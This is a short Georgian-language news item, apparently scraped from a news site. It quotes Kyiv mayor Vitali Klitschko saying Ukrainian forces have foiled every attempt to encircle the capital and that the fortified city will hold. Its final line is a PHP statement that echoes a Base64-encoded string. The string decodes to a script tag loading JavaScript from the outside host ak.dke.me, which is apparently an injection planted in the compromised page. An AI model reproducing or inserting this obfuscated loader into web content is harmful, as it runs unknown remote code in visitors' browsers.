celsiusi
ავერსი საქკაბელი
 
კიევის მერი, ვიტალი კლიჩკო ამბობს, რომ უკრაინელმა სამხედროებმა რუსი ოკუპანტების მხრიდან დედაქალაქის ალყაში მოქცევის ყველა მცდელობა ჩაშალეს. კიევში ამ დროისთვის 2 მილიონზე ნაკლები ადამიანია დარჩენილი, თუმცა ამის მიუხედავად, ყოველი ქუჩა, შენობა და ბლოკპოსტი გამაგრებულია.
 
"უკანასკნელი მონაცემებით ყოველმა მეორე კიეველმა ახლა დედაქალაქი დატოვა. აქ 2 მილიონზე ცოტა ნაკლები ადამიანი დარჩა. მიუხედავად ამისა, კიევი ახლა გადაიქცა ციხესიმაგრედ, ყოველი ქუჩა, შენობა, ბლოკპოსტი გამაგრებულია. ჩვენმა ბიჭებმა ჩაშალეს კიევის ალყაში მოქცევის ყველა მცდელობა და ამ მიმართულებით მათ ყველანაირად ვეხმარებით. ასეთი სულისკვეთება არასდროს ყოფილა. ყველა ამბობს, რომ არაფერი მოხდება, რომ ქალაქს არ ჩააბარებენ და მტერი ვერ შემოვა. ყველას მინდა ცხადად ვუთხრა - დედაქალაქი იდგა, დგას და იდგება!", - განაცხადა ვიტალი კლიჩკომ.
 
 
733
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");